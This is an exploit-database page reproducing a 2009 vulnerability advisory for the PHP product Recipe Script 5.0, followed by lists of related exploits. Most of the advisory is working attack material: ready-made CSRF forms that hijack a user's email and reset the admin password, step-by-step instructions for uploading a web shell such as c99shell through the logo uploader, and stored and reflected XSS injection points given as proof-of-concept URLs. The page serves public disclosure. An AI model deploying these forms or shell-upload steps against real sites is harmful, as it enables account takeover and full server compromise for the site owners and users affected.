Menu

Search for hundreds of thousands of exploits

"Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting"

Author

Exploit author

"Milos Zivanovic"

Platform

Exploit platform

php

Release date

Exploit published date

2009-12-16

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
[#-----------------------------------------------------------------------------------------------#]
[#] Title: Recipe Script v5.0 (Shell Upload/XSRF/XSS) Multiple Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 16. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Recipe Script
[#] Version: 5.0
[#] Platform: PHP
[#] Link: http://www.recipescript.com/index.php
[#] Price: ~98 USD
[#] Vulnerability: Multiple Vulnerabilities such as XSRF, Shell Upload, XSS
[#-----------------------------------------------------------------------------------------------#]

[#]Content
 |--User Panel
 |  |--Change user email
 |
 |--Admin Panel
    |--Shell upload vulnerability
    |
    |--XSRF
    |  |--Change admin password
    |  |--Send email to subscribers
    |
    |--Persistent XSS
    |  |--Edit footer
    |  |--Add/Edit Category
    |  |--Add/Edit Recipe
    |  |--Add/Edit Menu
    |  |--Add/Edit Block
    |
    |--XSS
       |--XSS in /admin/recipes.php
       |--XSS in /admin/categories.php
       |--XSS in /admin/all_comments.php
       |--XSS in /admin/users.php
       |--XSS in /admin/comments.php
       |--XSS in /admin/menus.php
       |--XSS in /admin/links.php
       |--XSS in /admin/banners.php


[#]User Panel

[*]Change user email (XSRF)

We can use the following exploit to change users email and then go to
'forget your password' form and it will send us password on the email.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/recipes/update_profile.php" method="POST">
  <input name="first_name" type="text" value="DEMO">
  <input name="last_name" type="text" value="USER">
  <input name="website" type="text" value="website.com">
  <input name="country" type="text" value="Moon State">
  <input name="email" type="text" value="our@email.com">
  <input type="checkbox" name="subscribed" value="1">
  <input type="submit" name="Submit" value="Update">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]Admin Panel

[*]Shell upload vulnerability

Visit link:
http://localhost/recipes/admin/add_logo.php
Upload your shell (ex. c99shell.php)
Your shell should be here:
http://localhost/recipes/admin/uploads/logo_.php
If by any chanse is not there, open this page:
http://localhost/recipes/admin/logo.php
You'll see broken html object, right click > properties, and you will
see the link to your shell

[#]XSRF (Cross Site Request Forgery)

[*]Change admin password

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/recipes/admin/adminpass.php" method="POST">
  <input type="password" name="AdminPass" value="hacked">
  <input type="password" name="cAdminPass" value="hacked">
  <input type="submit" name="submit" value="Update Password">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[-]Send email to subscribers

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/recipes/admin/send_email_users.php"
method="POST">
  <input type="hidden" name="from_email" value="support@site.com">
  <input type="hidden" name="subject" value="Subject">
  <input type="hidden" name="message" value="Free your mind and the
ass will follow!">
  <input type="hidden" name="emailtype" value="">
  <input type="submit" name="Submit" value="Send">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]Persistent XSS (Cross Site Scripting)

[+]Edit footer (Persistent XSS)

script: http://localhost/recipes/admin/edit_footertext.php
is vulnerable to persistent xss attack, we can inject our malicious
code in there and it will be on every page.

[*]Add/Edit Category (Persistent XSS)

Add: http://localhost/recipes/admin/add_category.php
Edit: http://localhost/recipes/admin/categories.php
Field that i tested is 'Category name'. We can inject our malicious
code there and it will be seen on every page.

[+]Add/Edit Recipe (Persistent XSS)

Add: http://localhost/recipes/admin/add_recipe.php
Edit: http://localhost/recipes/admin/recipes.php
Vulnerable field is 'Recipe name'.

[+]Add/Edit Menu (Persistent XSS)

Add: http://localhost/recipes/admin/add_menu.php
Edit: http://localhost/recipes/admin/menus.php
Vulnerable field is 'Menu name'. This is seen in every page in the
front end of the cms.

[+]Add/Edit Block (Persistent XSS)

Add: http://localhost/recipes/admin/add_block.php
Edit: http://localhost/recipes/admin/blocks.php
Vulnerable field is 'Block name'.

[#]XSS (Cross Site Scripting)

I used following javascript in testing: 

[-]XSS in /admin/recipes.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/recipes.php?searchword="[XSS]
http://localhost/recipes/admin/recipes.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/categories.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/categories.php?searchword="[XSS]
http://localhost/recipes/admin/categories.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/all_comments.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/all_comments.php?searchword="[XSS]
http://localhost/recipes/admin/all_comments.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/users.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/users.php?searchword="[XSS]
http://localhost/recipes/admin/users.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/comments.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/comments.php?searchword="[XSS]
http://localhost/recipes/admin/comments.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/menus.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/menus.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/links.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/links.php?searchword="[XSS]
http://localhost/recipes/admin/links.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]XSS in /admin/banners.php

[POC----------------------------------------------------------------------------------------------]
http://localhost/recipes/admin/banners.php?searchword="[XSS]
http://localhost/recipes/admin/banners.php?numitem="[XSS]
[POC----------------------------------------------------------------------------------------------]

[#]EOF
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2010-02-07 "Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php "Milos Zivanovic"
2010-02-03 "KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)" webapps php "Milos Zivanovic"
2010-01-22 "KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2010-01-02 "eazyPortal 1.0.0 - Multiple Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-16 "eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Milos Zivanovic"
2009-12-16 "Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting" webapps php "Milos Zivanovic"
2009-12-16 "BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-16 "BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-15 "Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2009-12-15 "Ez Cart 1.0 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-15 "Ez News Manager / Pro - Cross-Site Request Forgery (Change Admin Password)" webapps php "Milos Zivanovic"
2009-12-15 "Scriptsez Ez FAQ Maker 1.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2009-12-15 "Ez Faq Maker - Multiple Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "Smart PHP Subscriber - Multiple Disclosure Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "Ez Guestbook 1.0 - Multiple Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "Ez Poll Hoster - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "Ez Poll Hoster - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-14 "mini Hosting Panel - Cross-Site Request Forgery (Change Admin Settings)" webapps php "Milos Zivanovic"
2009-12-14 "Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)" webapps linux "Milos Zivanovic"
2009-12-13 "Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php "Milos Zivanovic"
2009-12-13 "Frog CMS 0.9.5 - Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2009-12-13 "AccStatistics 1.1 - Cross-Site Request Forgery (Change Admin Settings)" webapps php "Milos Zivanovic"
2009-12-11 "Chipmunk NewsLetter - Cross-Site Request Forgery" webapps php "Milos Zivanovic"
2009-12-11 "oBlog - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Brute Force" webapps php "Milos Zivanovic"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.